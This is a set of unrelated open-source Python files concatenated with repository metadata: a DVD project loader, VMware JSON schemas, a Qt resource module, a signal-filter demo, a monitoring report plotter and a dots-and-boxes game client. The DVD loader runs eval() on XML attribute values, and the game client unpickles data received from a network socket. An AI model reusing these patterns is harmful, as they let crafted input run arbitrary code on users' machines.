for key, val in title.properties.dict().iteritems():
if type(val) is ConfigSubList:
audiotracks.append('\t\t\t<audiotracks>\n')
for audiotrack in val:
audiotracks.append('\t\t\t\t<audiotrack ')
for subkey, subval in audiotrack.dict().iteritems():
audiotracks.append( subkey + '="' + str(subval.getValue()) + '" ' )
audiotracks.append(' />\n')
audiotracks.append('\t\t\t</audiotracks>\n')
else:
list.append( key + '="' + str(val.getValue()) + '" ' )
list.append('/>\n')
for line in audiotracks:
list.append(line)
list.append('\t\t</title>\n')
list.append('\t</titles>\n')
list.append('</DreamDVDBurnerProject>\n')
name = self.settings.name.getValue()
i = 0
filename = path + name + ".ddvdp.xml"
while fileExists(filename):
i = i+1
filename = path + name + str(i).zfill(3) + ".ddvdp.xml"
try:
file = open(filename, "w")
for x in list:
file.write(x)
file.close()
except:
return False
return filename
def load(self, filename):
ret = self.loadProject(filename)
if ret:
ret = self.menutemplate.loadTemplate(self.settings.menutemplate.getValue())
self.error += self.menutemplate.error
return ret
def loadProject(self, filename):
#try:
if not fileExists(filename):
self.error = "xml file not found!"
#raise AttributeError
file = open(filename, "r")
data = file.read().decode("utf-8").replace('&',"&").encode("ascii",'xmlcharrefreplace')
file.close()
projectfiledom = xml.dom.minidom.parseString(data)
for node in projectfiledom.childNodes[0].childNodes:
print "node:", node
if node.nodeType == xml.dom.minidom.Element.nodeType:
if node.tagName == 'settings':
self.xmlAttributesToConfig(node, self.settings)
elif node.tagName == 'titles':
self.xmlGetTitleNodeRecursive(node)
for key in self.filekeys:
val = self.settings.dict()[key].getValue()
if not fileExists(val):
if val[0] != "/":
if key.find("font") == 0:
val = resolveFilename(SCOPE_FONTS)+val
else:
val = resolveFilename(SCOPE_PLUGINS)+"Extensions/DVDBurn/"+val
if fileExists(val):
self.settings.dict()[key].setValue(val)
continue
self.error += "\n%s '%s' not found" % (key, val)
#except AttributeError:
#print "loadProject AttributeError", self.error
#self.error += (" in project '%s'") % (filename)
#return False
return True
def xmlAttributesToConfig(self, node, config):
try:
i = 0
#if node.attributes.length < len(config.dict())-1:
#self.error = "project attributes missing"
#raise AttributeError
while i < node.attributes.length:
item = node.attributes.item(i)
key = item.name.encode("utf-8")
try:
val = eval(item.nodeValue)
except (NameError, SyntaxError):
val = item.nodeValue.encode("utf-8")
try:
print "config[%s].setValue(%s)" % (key, val)
config.dict()[key].setValue(val)
except (KeyError):
self.error = "unknown attribute '%s'" % (key)
print "KeyError", self.error
raise AttributeError
i += 1
except AttributeError:
self.error += (" XML attribute error '%s'") % node.toxml()
return False
def xmlGetTitleNodeRecursive(self, node, title_idx = -1):
print "[xmlGetTitleNodeRecursive]", title_idx, node
print node.childNodes
for subnode in node.childNodes:
print "xmlGetTitleNodeRecursive subnode:", subnode
if subnode.nodeType == xml.dom.minidom.Element.nodeType:
if subnode.tagName == 'title':
title_idx += 1
title = DVDTitle.DVDTitle(self)
self.titles.append(title)
self.xmlGetTitleNodeRecursive(subnode, title_idx)
if subnode.tagName == 'path':
print "path:", subnode.firstChild.data
filename = subnode.firstChild.data
self.titles[title_idx].addFile(filename.encode("utf-8"))
if subnode.tagName == 'properties':
self.xmlAttributesToConfig(node, self.titles[title_idx].properties)
if subnode.tagName == 'audiotracks':
self.xmlGetTitleNodeRecursive(subnode, title_idx)
if subnode.tagName == 'audiotrack':
print "audiotrack...", subnode.toxml()
def getSize(self):
totalsize = 0
for title in self.titles:
totalsize += title.estimatedDiskspace
return totalsize
size = property(getSize)
class MenuTemplate(DVDProject):
def __init__(self):
self.settings = ConfigSubsection()
self.settings.titleformat = ConfigText(fixed_size = False, visible_width = 40)
self.settings.subtitleformat = ConfigText(fixed_size = False, visible_width = 40)
self.settings.menubg = ConfigFilename()
self.settings.menuaudio = ConfigFilename()
self.settings.dimensions = ConfigSequence(seperator = ',', default = [576,720], limits = [(352,720),(480,576)])
self.settings.rows = ConfigInteger(default = 4, limits = (1, 10))
self.settings.cols = ConfigInteger(default = 1, limits = (1, 4))
self.settings.color_headline = ConfigColor()
self.settings.color_highlight = ConfigColor()
self.settings.color_button = ConfigColor()
self.settings.fontface_headline = ConfigFilename()
self.settings.fontface_title = ConfigFilename()
self.settings.fontface_subtitle = ConfigFilename()
self.settings.fontsize_headline = ConfigInteger(default = 46, limits = (0, 199))
self.settings.fontsize_title = ConfigInteger(default = 24, limits = (0, 199))
self.settings.fontsize_subtitle = ConfigInteger(default = 14, limits = (0, 199))
self.settings.margin_top = ConfigInteger(default = 120, limits = (0, 500))
self.settings.margin_bottom = ConfigInteger(default = 40, limits = (0, 500))
self.settings.margin_left = ConfigInteger(default = 56, limits = (0, 500))
self.settings.margin_right = ConfigInteger(default = 56, limits = (0, 500))
self.settings.space_rows = ConfigInteger(default = 32, limits = (0, 500))
self.settings.space_cols = ConfigInteger(default = 24, limits = (0, 500))
self.settings.prev_page_text = ConfigText(default = "<<<", fixed_size = False)
self.settings.next_page_text = ConfigText(default = ">>>", fixed_size = False)
self.settings.offset_headline = ConfigSequence(seperator = ',', default = [0,0], limits = [(-1,500),(-1,500)])
self.settings.offset_title = ConfigSequence(seperator = ',', default = [0,0], limits = [(-1,500),(-1,500)])
self.settings.offset_subtitle = ConfigSequence(seperator = ',', default = [20,0], limits = [(-1,500),(-1,500)])
self.settings.offset_thumb = ConfigSequence(seperator = ',', default = [40,0], limits = [(-1,500),(-1,500)])
self.settings.thumb_size = ConfigSequence(seperator = ',', default = [200,158], limits = [(0,576),(-1,720)])
self.settings.thumb_border = ConfigInteger(default = 2, limits = (0, 20))
self.filekeys = ["menubg", "menuaudio", "fontface_headline", "fontface_title", "fontface_subtitle"]
from TitleProperties import languageChoices
self.settings.menulang = ConfigSelection(choices = languageChoices.choices, default=languageChoices.choices[1][0])
self.error = ""
def loadTemplate(self, filename):
ret = DVDProject.loadProject(self, filename)
DVDProject.error = self.error
return ret
| openpli-arm/enigma2-arm | lib/python/Plugins/Extensions/DVDBurn/DVDProject.py | Python | gpl-2.0 | 10,154 |
# -*- coding: utf-8 -*-
#
# Copyright (C) 2014 GNS3 Technologies Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from .custom_adapters import CUSTOM_ADAPTERS_ARRAY_SCHEMA
VMWARE_CREATE_SCHEMA = {
"$schema": "http://json-schema.org/draft-04/schema#",
"description": "Request validation to create a new VMware VM instance",
"type": "object",
"properties": {
"node_id": {
"description": "Node UUID",
"type": "string",
"minLength": 36,
"maxLength": 36,
"pattern": "^[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}$"
},
"linked_clone": {
"description": "Whether the VM is a linked clone or not",
"type": "boolean"
},
"name": {
"description": "VMware VM instance name",
"type": "string",
"minLength": 1,
},
"usage": {
"description": "How to use the VMware VM",
"type": "string",
},
"vmx_path": {
"description": "Path to the vmx file",
"type": "string",
"minLength": 1,
},
"console": {
"description": "Console TCP port",
"minimum": 1,
"maximum": 65535,
"type": ["integer", "null"]
},
"console_type": {
"description": "Console type",
"enum": ["telnet", "none"]
},
"headless": {
"description": "Headless mode",
"type": "boolean"
},
"on_close": {
"description": "Action to execute on the VM is closed",
"enum": ["power_off", "shutdown_signal", "save_vm_state"],
},
"adapters": {
"description": "Number of adapters",
"type": "integer",
"minimum": 0,
"maximum": 10, # maximum adapters support by VMware VMs
},
"adapter_type": {
"description": "VMware adapter type",
"type": "string",
"minLength": 1,
},
"use_any_adapter": {
"description": "Allow GNS3 to use any VMware adapter",
"type": "boolean",
},
"custom_adapters": CUSTOM_ADAPTERS_ARRAY_SCHEMA
},
"additionalProperties": False,
"required": ["name", "vmx_path", "linked_clone"],
}
VMWARE_OBJECT_SCHEMA = {
"$schema": "http://json-schema.org/draft-04/schema#",
"description": "VMware VM instance",
"type": "object",
"properties": {
"name": {
"description": "VMware VM instance name",
"type": "string",
"minLength": 1,
},
"usage": {
"description": "How to use the VMware VM",
"type": "string",
},
"node_id": {
"description": "Node UUID",
"type": "string",
"minLength": 36,
"maxLength": 36,
"pattern": "^[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}$"
},
"status": {
"description": "VM status",
"enum": ["started", "stopped", "suspended"]
},
"node_directory": {
"description": "Path to the node working directory",
"type": ["string", "null"]
},
"project_id": {
"description": "Project UUID",
"type": "string",
"minLength": 36,
"maxLength": 36,
"pattern": "^[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}$"
},
"vmx_path": {
"description": "Path to the vmx file",
"type": "string",
"minLength": 1,
},
"headless": {
"description": "Headless mode",
"type": "boolean"
},
"on_close": {
"description": "Action to execute on the VM is closed",
"enum": ["power_off", "shutdown_signal", "save_vm_state"],
},
"adapters": {
"description": "Number of adapters",
"type": "integer",
"minimum": 0,
"maximum": 10, # maximum adapters support by VMware VMs
},
"adapter_type": {
"description": "VMware adapter type",
"type": "string",
"minLength": 1,
},
"use_any_adapter": {
"description": "Allow GNS3 to use any VMware adapter",
"type": "boolean",
},
"console": {
"description": "Console TCP port",
"minimum": 1,
"maximum": 65535,
"type": ["integer", "null"]
},
"console_type": {
"description": "Console type",
"enum": ["telnet", "none"]
},
"linked_clone": {
"description": "Whether the VM is a linked clone or not",
"type": "boolean"
},
"custom_adapters": CUSTOM_ADAPTERS_ARRAY_SCHEMA
},
"additionalProperties": False
}
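# --- Editor's sketch (hedged): not part of the original module. ---
# Illustrates how a request body could be checked against VMWARE_CREATE_SCHEMA
# with the jsonschema package; the payload below is purely illustrative.
if __name__ == "__main__":
    from jsonschema import validate
    payload = {
        "name": "example-vm",
        "vmx_path": "/vmware/example/example.vmx",
        "linked_clone": False,
    }
    validate(payload, VMWARE_CREATE_SCHEMA)  # raises ValidationError on invalid input
    print("payload conforms to VMWARE_CREATE_SCHEMA")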
| GNS3/gns3-server | gns3server/schemas/vmware.py | Python | gpl-3.0 | 5,652 |
# -*- coding: utf-8 -*-
# Resource object code
#
# Created: qui mar 3 18:02:04 2016
# by: The Resource Compiler for PyQt (Qt v4.8.6)
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore
qt_resource_data = "\
\x00\x00\x02\xd5\
\x89\
\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\
\x00\x00\x11\x00\x00\x00\x17\x08\x06\x00\x00\x00\xed\x34\xa4\xe7\
\x00\x00\x00\x06\x62\x4b\x47\x44\x00\xff\x00\xff\x00\xff\xa0\xbd\
\xa7\x93\x00\x00\x00\x09\x70\x48\x59\x73\x00\x00\x0b\x13\x00\x00\
\x0b\x13\x01\x00\x9a\x9c\x18\x00\x00\x00\x07\x74\x49\x4d\x45\x07\
\xe0\x02\x0c\x13\x33\x03\x99\x84\x74\x59\x00\x00\x02\x62\x49\x44\
\x41\x54\x38\xcb\xcd\x93\x4d\x48\x54\x51\x14\xc7\xff\xe7\xbe\xfb\
\xde\x1b\x47\xc9\xb4\x0f\x21\x31\xed\x83\x24\xa4\x19\xfa\xc2\xbe\
\xa0\xa4\xa0\x5a\x34\x16\x04\x11\xa9\x10\x6d\x82\x5c\x38\x83\x85\
\x20\x25\x85\xb9\x31\xb2\x82\x5a\x08\x85\xf4\x61\x31\x11\x62\xd8\
\xaa\xb4\x76\xb5\x90\x28\xa5\x4d\x64\x68\xb6\x09\x2c\x21\x22\xeb\
\xbd\x7b\xef\x69\x31\x66\x8e\x8e\x83\xba\xea\xac\xce\xbd\x87\xfb\
\xbb\xf7\x7f\xce\xff\x12\xa6\x44\xe8\xfc\x1d\xf4\x35\x54\x62\x43\
\x73\x47\x90\x84\xb8\x2c\x88\xf6\x69\x63\xda\x8c\x51\x4d\x6f\xce\
\x1c\xf6\xc2\x17\xef\xe3\x6d\xfd\xd1\xa4\x33\x22\xdc\xd8\x9e\xb4\
\xd1\xd7\x50\x99\x28\x48\x3b\x62\x07\x02\xa5\x65\x6b\xf2\x77\x48\
\x37\x78\xc4\x92\xee\xfe\xb5\xd1\x16\x77\x2a\x20\xd4\xd8\x0e\x02\
\x80\xf0\x85\xbb\x39\x24\xe5\x3a\x10\x09\x90\x95\x2b\x1c\xa7\x9c\
\x2c\xe7\x18\x84\xf0\x58\x79\xaf\xc9\x76\x36\x43\x6b\x9b\x8d\x7a\
\xce\x9e\xdf\xc6\xc6\x1f\x86\x81\xd1\xda\xef\xef\x3f\x57\x31\x4a\
\xeb\x9b\x3b\x42\xd2\x71\x1f\xd8\xd2\xd2\x9e\x46\x31\x03\x36\x84\
\x00\x11\x25\xae\x62\x00\xe3\x29\x98\xc1\x6c\x40\x0c\x76\x2d\xea\
\xf3\x94\xb2\xb5\xf7\xbb\x42\xda\x6e\xe0\x66\x30\x23\x10\x2f\x5b\
\xb9\xf4\xda\xfb\x91\x1f\x5b\x0d\x73\x36\x00\x83\x99\x83\x88\x30\
\x56\x90\x9d\xd9\xf3\xea\xd3\x48\xed\x2f\xa2\x16\xc9\x24\x8a\x8d\
\xaf\x62\x0d\xbb\x4b\xbe\x01\x78\x82\x39\xc4\xb6\x1b\x4f\xbb\x0d\
\x51\x8d\x00\xc1\x80\x79\x2e\x67\xb1\xe9\x52\xe7\xb8\x3a\x26\x00\
\x46\x60\x1e\xd1\x5b\x5b\x8e\x25\x7b\xab\x27\xd6\x72\x72\x71\xcb\
\x95\xc7\x27\x18\xe2\x20\x00\x9d\x86\x21\x04\xb8\xeb\x65\xcd\x81\
\xd6\xd5\x91\xc8\x74\x48\x5e\xf6\x82\x17\x0a\x18\xe2\xc4\x4c\x66\
\x6c\xac\x43\x18\xfc\x9b\x03\xa0\x24\x48\xe7\xf1\x5d\x03\x00\x06\
\x66\x2b\x4b\x40\x08\xc0\x24\x43\x36\x36\x77\xec\x04\x50\x3a\xee\
\x8e\x54\xaf\x21\x00\x44\x40\x6f\xef\xe9\x43\x3d\x29\x7b\xb2\x6c\
\x71\x6e\x9e\x02\x15\x53\x1a\x9f\x30\x20\x6c\xe2\xcf\x93\xf7\x26\
\x20\xb7\xdf\x0d\xa1\xaa\xa4\x30\x0e\x20\x3e\x1b\x29\x5f\x47\x07\
\x11\x69\xff\x90\x0c\xa9\x2a\x29\xc4\xaa\xb3\xb7\x0a\x1c\x61\xad\
\xa0\x09\x9f\xa7\x7c\x09\x79\x46\x7f\x5c\x94\x53\x34\xbc\xfd\xfa\
\xb3\xe9\x72\x8a\xf2\x97\xc7\x7c\xa0\x9a\x01\x35\xe3\x68\x00\xe9\
\x10\x5a\x07\x80\x53\x29\x7b\xd2\x7d\x72\x4f\x14\x40\x74\xae\xe6\
\x9b\x97\x63\xff\x3f\x08\x11\x31\x00\x08\x22\xb2\x3c\xad\xdd\xf9\
\x40\x94\x52\xb6\x14\xc4\x32\x53\x5a\x0f\xbf\xfb\xaa\x2e\xd4\x14\
\x37\xcc\x3c\x86\x74\xf3\xfd\x37\x67\x16\x82\x32\x7d\xa3\xeb\xb2\
\xdc\xc0\x3d\x59\x90\x93\x15\xfb\xe2\xd8\x57\x7f\xba\xce\x23\x06\
\x11\xd2\x7f\xbe\x49\x52\xc0\x41\x47\x76\x2d\xcc\xb0\xeb\xff\x00\
\x72\x5e\xce\xb1\x24\xf6\xb4\x1c\x00\x00\x00\x00\x49\x45\x4e\x44\
\xae\x42\x60\x82\
"
qt_resource_name = "\
\x00\x07\
\x07\x3b\xe0\xb3\
\x00\x70\
\x00\x6c\x00\x75\x00\x67\x00\x69\x00\x6e\x00\x73\
\x00\x0b\
\x03\xb1\x69\x82\
\x00\x74\
\x00\x61\x00\x73\x00\x6b\x00\x6d\x00\x61\x00\x6e\x00\x61\x00\x67\x00\x65\x00\x72\
\x00\x08\
\x0a\x61\x5a\xa7\
\x00\x69\
\x00\x63\x00\x6f\x00\x6e\x00\x2e\x00\x70\x00\x6e\x00\x67\
"
qt_resource_struct = "\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\
\x00\x00\x00\x14\x00\x02\x00\x00\x00\x01\x00\x00\x00\x03\
\x00\x00\x00\x30\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
"
def qInitResources():
QtCore.qRegisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data)
def qCleanupResources():
QtCore.qUnregisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data)
qInitResources()
| alexlopespereira/taskmanager | resources.py | Python | gpl-3.0 | 4,106 |
#!/usr/bin/env python
# _*_ coding: latin-1 _*_
# jtfilefilter
#
# File filter for the jtdirlist and jtfilechooser classes.
# Separate filters must be specified for directories and for regular files.
#
# regexdir : a single regular expression for directories
# regexlist : a list of regular expressions for regular files
#
# regexlist can be extended with the addregex and addpattern methods;
# the latter tries to convert a file mask into a regular expression
def jtfilepattern(x):
    # Note: the Java Pattern class can do far more than this; these lines are
    # just a reminder for the simplest cases.
if x:
x=x.replace(".","\.")
x=x.replace("*",".*")
x=x.replace("?",".")
return x
class new:
def __init__(self):
self.description = ""
self.regexdir = None # regular exp for dirs
self.regexlist = [] # regular exps for files
def addregex(self,rx):
self.regexlist.append(rx)
return rx
def addpattern(self,p):
fp=jtfilepattern(p)
self.regexlist.append(fp)
return fp
def xmlout(self):
x="<filter>"
if self.description:
x+="<description>"+self.description+"</description>"
if self.regexdir:
x+="<dirmask>"+self.regexdir+"</dirmask>"
for e in self.regexlist:
x+="<mask>"+e+"</mask>"
x+="</filter>"
return x
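# --- Editor's sketch (hedged): usage example, not part of the original module. ---
# Shows the intended API: addpattern() converts a simple file mask into a regex,
# addregex() stores a regex verbatim, and xmlout() serialises the filter. The
# names and patterns below are illustrative only.
if __name__ == "__main__":
    f = new()
    f.description = "Python and text files"
    f.regexdir = ".*"            # accept every directory
    f.addpattern("*.py")         # stored as the regex ".*\.py"
    f.addregex(r".*\.txt$")
    print(f.xmlout())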
| mrev11/ccc3 | jt/jtpython/jtlib/jtfilefilter.py | Python | lgpl-2.1 | 1,423 |
#example taken from scipy documentation
from scipy import signal
import matplotlib.pyplot as plt
import numpy as np
# design the filter using a Hamming window
b = signal.firwin(9, 0.8, window='hamming', pass_zero=True)
# low-pass: pass_zero=True
# high-pass: pass_zero=False
fs=1e3
t,T=np.linspace(1./fs,5,fs*5,retstep=True);
nFs=1/T;
F=10 # fundamental frequency, 10 Hz (defined but not used below)
w=2*np.pi*5 # angular frequency (5 Hz)
Vm=4 # wave amplitude
# generate a composite wave made of sinusoids
y=Vm*np.cos(w*t)+Vm/2*np.cos(2*w*t+np.deg2rad(45))+Vm/3*np.cos(3*w*t)+Vm/2*np.cos(4*w*t)
# generate a sinusoidal noise wave: high frequency, low amplitude
x=2*np.cos(2*np.pi*370*t)
# noisy wave
yx=y+x
# filter the noisy wave using the FIR filter
yf=signal.lfilter(b, [1.0],yx)
plt.subplot(311)
plt.plot(t,y)
plt.title('wave without noise')
plt.subplot(312)
plt.plot(t,yx)
plt.title('wave with noise')
plt.subplot(313)
plt.plot(t,yf)
plt.title('filtered wave')
plt.xlabel('time')
plt.show()
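# --- Editor's sketch (hedged): extension, not part of the original script. ---
# The complementary high-pass design uses the same firwin call with
# pass_zero=False; signal.freqz exposes the frequency response of either filter.
b_hp = signal.firwin(9, 0.8, window='hamming', pass_zero=False)  # high-pass variant
wf, h = signal.freqz(b)          # response of the low-pass design above
wf_hp, h_hp = signal.freqz(b_hp)
plt.figure()
plt.plot(wf/np.pi, np.abs(h), label='low-pass (pass_zero=True)')
plt.plot(wf_hp/np.pi, np.abs(h_hp), label='high-pass (pass_zero=False)')
plt.xlabel('normalized frequency (x pi rad/sample)')
plt.ylabel('|H|')
plt.legend()
plt.show()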
| miltonsarria/dsp-python | filters/FIR/filter_sine2.py | Python | mit | 1,015 |
from distutils.dir_util import copy_tree
from operator import itemgetter
import pandas as pd
import sys
from jinja2 import Environment, FileSystemLoader
import os
def generate_reports(folder):
hosts = []
# get all the paths of the root folder
files = [os.path.join(folder, fn) for fn in next(os.walk(folder))[2] if not fn.startswith(".")]
for logfile in files:
try:
data = pd.read_csv(logfile, delim_whitespace=True, comment='#', header=-1, index_col='timestamp',
parse_dates={'timestamp': [0, 1]})
print "reading data from " + logfile
        except Exception, err:
            print "duplicate index occurred in " + logfile
            print "There are two similar timestamps in the log." \
                  " To correct that error remove the duplicate entry from " + logfile
            continue  # skip this log file; the code below would otherwise use missing or stale data
hostname = os.path.basename(logfile).replace('.tab', "")
host_data = {}
host_data['name'] = hostname
# CPU data
host_data['cpu_data'] = data.ix[:, 2].to_json(date_format='iso')
host_data['cpu_load'] = data.ix[:, 16].to_json(date_format='iso')
# Memorydata
host_data['mem_data'] = data.ix[:, 20].apply(lambda x: x / 1024000).to_json(date_format='iso')
# Disk data
host_data['disk_read'] = data.ix[:, 66].apply(lambda x: x / 1024).to_json(date_format='iso')
host_data['disk_write'] = data.ix[:, 67].apply(lambda x: x / 1024).to_json(date_format='iso')
# Network Data
host_data['net_rx'] = data.ix[:, 57].to_json(date_format='iso')
host_data['net_tx'] = data.ix[:, 58].to_json(date_format='iso')
hosts.append(host_data)
env = Environment(loader=FileSystemLoader('templates'))
env.add_extension("chartkick.ext.charts")
cpu_template = env.get_template('cpu_template.html')
memory_template = env.get_template('memory_template.html')
disk_template = env.get_template('disk_template.html')
network_template = env.get_template('network_template.html')
cpu_output = cpu_template.render(
hosts=sorted(hosts, key=itemgetter('name'), reverse=True),
)
memory_output = memory_template.render(
hosts=sorted(hosts, key=itemgetter('name'), reverse=True),
)
disk_output = disk_template.render(
hosts=sorted(hosts, key=itemgetter('name'), reverse=True),
)
network_output = network_template.render(
hosts=sorted(hosts, key=itemgetter('name'), reverse=True),
)
test_name = os.path.basename(folder)
test_name += "-report"
if not os.path.exists(test_name):
os.mkdir(test_name)
os.chdir(test_name)
# creating folder structure
if not os.path.exists('css'):
os.mkdir('css')
if not os.path.exists('js'):
os.mkdir('js')
if not os.path.exists('img'):
os.mkdir('img')
if not os.path.exists('fonts'):
os.mkdir('fonts')
copy_tree(os.path.abspath('../css'), 'css')
copy_tree(os.path.abspath('../js'), 'js')
copy_tree(os.path.abspath('../img'), 'img')
copy_tree(os.path.abspath('../fonts'), 'fonts')
with open('report_cpu.html', 'w') as f:
f.write(cpu_output)
with open('report_memory.html', 'w') as f:
f.write(memory_output)
with open('report_disk.html', 'w') as f:
f.write(disk_output)
with open('report_network.html', 'w') as f:
f.write(network_output)
def main(argv):
try:
folder = argv[1].strip()
generate_reports(folder)
print "########################################"
print "report generated successfully"
except Exception, err:
print err.message
print "should provide an input folder. ex : python plotter.py <input-folder>"
if __name__ == '__main__':
main(sys.argv)
| shelan/collectl-monitoring | plotter.py | Python | apache-2.0 | 3,847 |
#!/usr/bin/python
from PyQt4 import QtGui
from PyQt4 import QtCore
from ui_board import Ui_Form
from itertools import product
from waitingdialog import WaitingDialog
from exitdialog import ExitDialog
from Msgs import *
from cPickle import dumps, loads
class Board(QtGui.QMainWindow, Ui_Form):
vline_xposes = [116.0, 205.0, 294.0, 381.0, 477.0, 573.0]
vline_yposes = [133.0, 215.0, 294.0, 375.0, 462.0]
vline_poses = list(product(vline_xposes, vline_yposes))
hline_xposes = [132.0, 223.0, 308.0, 401.0, 494.0]
hline_yposes = [125.0, 204.0, 284.0, 363.0, 456.0, 534.0]
hline_poses = list(product(hline_xposes, hline_yposes))
mark_xposes = [160.0, 252.0, 344.0, 437.0, 529.0]
mark_yposes = [167.0, 247.0, 326.0, 406.0, 495.0]
mark_poses = list(product(mark_xposes, mark_yposes))
def __init__(self):
"""
"""
QtGui.QMainWindow.__init__(self)
self.line_map = dict()
self.lines = 60 * [False]
self.line_items = 60 * [None]
self.socket = None
self.n = 6
self.t = 0
self.turn = 'y'
self.score = {'y':0, 'o':0}
self.dline = None
self.dmark = None
self.avail = False
self.setupUi(self)
self.statusBar = QtGui.QStatusBar(self)
self.statusBar.setObjectName('statusBar')
self.setStatusBar(self.statusBar)
self.scene = DnbScene(0, 0, 700, 730)
self.scene.installEventFilter(self)
self.graphicsView.setScene(self.scene)
self.graphicsView.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)
self.graphicsView.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)
def eventFilter(self, obj, event):
if event.type() == QtCore.QEvent.GraphicsSceneMouseDoubleClick and not self.avail:
print 'You can\'t play'
return True
else:
return QtGui.QMainWindow.eventFilter(self, obj, event)
def closeEvent(self, event):
"""
"""
#### TODO: exit game properly
dialog = ExitDialog()
if dialog.exec_():
event.accept()
else:
event.ignore()
def update_scoreboard(self):
"""
"""
pass
def add_line(self, line):
"""
"""
self.line_items[line][0].setZValue(3)
self.scene.removeItem(self.line_items[line][1])
self.lines[line] = True
#returns marks
marks = list()
if self.up_square(line):
marks.append(self.mark_number(line-self.n+1))
if self.down_square(line):
marks.append(self.mark_number(line+self.n))
if self.left_square(line):
marks.append(self.mark_number(line))
if self.right_square(line):
marks.append(self.mark_number(line+1))
return marks
def add_marks_y(self, marks):
"""
"""
# update score
for mark in marks:
x, y = Board.mark_poses[mark]
pitem = QtGui.QGraphicsPixmapItem()
pitem.setPos(x-15, y-15)
pitem.setPixmap(QtGui.QPixmap(":/board/y"))
pitem.setZValue(5)
self.scene.addItem(pitem)
self.score['y'] += len(marks)
def add_marks_o(self, marks):
"""
"""
# update score
for mark in marks:
x, y = Board.mark_poses[mark]
pitem = QtGui.QGraphicsPixmapItem()
pitem.setPos(x-15, y-15)
pitem.setPixmap(QtGui.QPixmap(":/board/o"))
pitem.setZValue(5)
self.scene.addItem(pitem)
def finish_game(self):
"""
"""
turnMsg = 'You Win' if self.score['y'] > self.score['o'] else 'You Lost'
scoreMsg = ('You: %d\tOpponent: %d\t\t' % (self.score['y'], self.score['o'])) + turnMsg
self.statusBar.showMessage(scoreMsg)
# close connection etc
QtGui.QMessageBox.information(self, 'Game Over', turnMsg)
exit(0)
# Signals
ui_ready = QtCore.pyqtSignal()
exit_game = QtCore.pyqtSignal()
# Slots
@QtCore.pyqtSlot()
def on_turn_recvd(self):
"""
"""
msg = loads(self.socket.readData(4096))
self.t += 1
print '------------------------ Turn #' + str(self.t) + ' Started ------------------------'
print 'Received turn message'
print ' ', 'Message:', msg
if msg:
# Valid message
line = msg['lines']
marks = msg['marks']
finished = msg['finished']
owner = msg['owner']
self.turn = msg['turn']
self.score = msg['score']
if owner != 'y':
if line != None:
print 'Lines to be added:', line
self.add_line(line)
if marks != [] and marks != None:
print 'Opponents marks:', marks
self.add_marks_o(marks)
self.update_scoreboard()
turnMsg = 'Your turn' if self.turn == 'y' else 'Opponent\'s turn'
scoreMsg = ('You: %d\tOpponent: %d\t\t' % (self.score['y'], self.score['o'])) + turnMsg
self.statusBar.showMessage(scoreMsg)
if finished:
self.finish_game()
elif self.turn == 'y':
self.avail = True
else:
self.avail = False
amsg = list()
amsg.append(TURN_RECVD)
smsg = dumps(amsg)
self.socket.writeData(smsg)
print '------------------------- Turn #' + str(self.t) + ' Ended -------------------------'
else:
# Opponent quit unexpectedly
QtGui.QMessageBox.critical(self, 'Game Over', 'Opponent has just quitted. Game over!', 'Exit Game')
exit(0)
@QtCore.pyqtSlot('QTcpSocket')
def after_create(self, sock):
"""
"""
self.init_board()
self.socket = sock
self.connect()
dialog = WaitingDialog(self)
self.socket.readyRead.connect(dialog.hide)
self.show()
self.ui_ready.emit()
dialog.show() # MODAL!!!
pass # Opponent join
self.show()
msg = dict()
msg['head'] = UIREADY
msg['body'] = None
msg = dumps(msg)
self.socket.writeData(msg)
self.socket.writeData('START')
QtCore.qDebug('GUI ready notification sent')
@QtCore.pyqtSlot('QTcpSocket')
def after_join(self, sock):
"""
"""
self.init_board()
self.socket = sock
self.connect()
self.show()
self.ui_ready.emit()
msg = dict()
msg['head'] = UIREADY
msg['body'] = None
msg = dumps(msg)
self.socket.writeData(msg)
self.socket.writeData('START')
QtCore.qDebug('GUI ready notification sent')
@QtCore.pyqtSlot('QPointF')
def on_line_add(self, point, b=False):
"""
"""
x, y = point.x(), point.y()
line = self.line_map[(x, y)]
if not self.lines[line]:
self.avail = False
marks = self.add_line(line)
print 'Your move adds line:', line
print 'Your marks:', marks
self.add_marks_y(marks) # update score
# send turn message
msg = dict()
msg['lines'] = line
msg['marks'] = marks
self.turn = msg['turn'] = 'y' if marks else 'o'
msg['score'] = self.score
turnMsg = 'Your turn' if self.turn == 'y' else 'Opponent\'s turn'
scoreMsg = ('You: %d\tOpponent: %d\t\t' % (self.score['y'], self.score['o'])) + turnMsg
self.statusBar.showMessage(scoreMsg)
print '------------------------- Turn #' + str(self.t) + ' Ended -------------------------'
smsg = [MOVE, msg]
smsg = dumps(smsg)
self.socket.writeData(smsg)
# Connections
def connect(self):
"""
"""
self.socket.readyRead.connect(self.on_turn_recvd)
self.scene.line_added.connect(self.on_line_add)
# Test functions
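    # Editor's note (hedged interpretation): the line indices appear to run row
    # by row over the 6x6 dot grid -- each block of 2*n-1 = 11 indices holds the
    # n-1 = 5 horizontal edges of one dot row followed by the n = 6 vertical
    # edges below it, and the final block (55-59) holds only the bottom row's
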